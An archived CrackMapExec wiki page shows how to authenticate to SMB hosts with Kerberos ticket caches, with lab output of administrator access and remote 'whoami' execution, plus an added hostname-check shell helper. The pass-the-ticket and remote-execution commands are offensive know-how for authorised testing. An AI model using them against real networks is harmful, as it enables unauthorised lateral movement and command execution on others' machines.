This repository has been archived by the owner on Dec 6, 2023. It is now read-only.

Using Kerberos

mpgn edited this page May 5, 2020 · 1 revision

CME supports Kerberos authentication. Set the KRB5CCNAME environment variable to specify the ticket to use.

/!\ Note: when using the --kerberos option, you must specify the same hostname as the one in the Kerberos ticket.

$ export KRB5CCNAME=/home/bonclay/impacket/administrator.ccache 
$ sudo cme smb zoro.gold.local --kerberos
SMB         zoro.gold.local 445    ZORO             [*] Windows 10.0 Build 14393 (name:ZORO) (domain:gold.local) (signing:False) (SMBv1:False)
SMB         zoro.gold.local 445    ZORO             [+] gold.local\administrator (Pwn3d!)
$ sudo cme smb zoro.gold.local --kerberos -x whoami
SMB         zoro.gold.local 445    ZORO             [*] Windows 10.0 Build 14393 (name:ZORO) (domain:gold.local) (signing:False) (SMBv1:False)
SMB         zoro.gold.local 445    ZORO             [+] gold.local\administrator (Pwn3d!)
SMB         zoro.gold.local 445    ZORO             [+] Executed command 
SMB         zoro.gold.local 445    ZORO             gold\administrator

$ export KRB5CCNAME=/home/bonclay/impacket/bonclay.ccache
$ sudo cme smb zoro.gold.local --kerberos -x whoami
SMB         zoro.gold.local 445    ZORO             [*] Windows 10.0 Build 14393 (name:ZORO) (domain:gold.local) (signing:False) (SMBv1:False)
SMB         zoro.gold.local 445    ZORO             [+] gold.local\bonclay 
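
The hostname requirement in the note above can be checked before running the command by comparing the target against the service principals that `klist` lists for the cache. This is an added example, not part of the original wiki page or the CME project; it assumes MIT-style `klist` output, and the function names, dates and sample ticket listing are constructed for illustration.

```shell
# Added example (not from the CME wiki): verify that the hostname passed with
# --kerberos appears as the host of a service principal in `klist` output.

# Constructed sample of MIT-style `klist` output, reusing the page's names.
SAMPLE_KLIST='Ticket cache: FILE:/home/bonclay/impacket/administrator.ccache
Default principal: administrator@GOLD.LOCAL

Valid starting       Expires              Service principal
05/05/2020 10:00:00  05/05/2020 20:00:00  krbtgt/GOLD.LOCAL@GOLD.LOCAL
        renew until 05/06/2020 10:00:00
05/05/2020 10:01:00  05/05/2020 20:00:00  cifs/zoro.gold.local@GOLD.LOCAL'

# ticket_hosts: read klist text on stdin and print, lowercased, the host part
# of every service principal of the form service/host@REALM.
ticket_hosts() {
    awk '
        /Service principal/ { in_table = 1; next }  # header row of the ticket table
        in_table && NF >= 5 {                       # ticket rows: two dates, two times, SPN
            spn = $NF
            sub(/@.*$/, "", spn)                    # drop the realm
            if (split(spn, parts, "/") == 2) print tolower(parts[2])
        }'
}

# host_in_tickets TARGET: exit 0 when TARGET (case-insensitive) equals one of
# the hosts found in the klist text on stdin, exit 1 otherwise.
host_in_tickets() {
    _target=$(printf '%s' "$1" | tr '[:upper:]' '[:lower:]')
    ticket_hosts | grep -Fxq -- "$_target"
}

# Typical use against the live cache: klist | host_in_tickets zoro.gold.local
if printf '%s\n' "$SAMPLE_KLIST" | host_in_tickets zoro.gold.local; then
    echo "zoro.gold.local matches a ticket in the cache"
fi
```

An IP address or a short name such as `zoro` will not match the `cifs/zoro.gold.local` entry, which is the mismatch the note describes.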
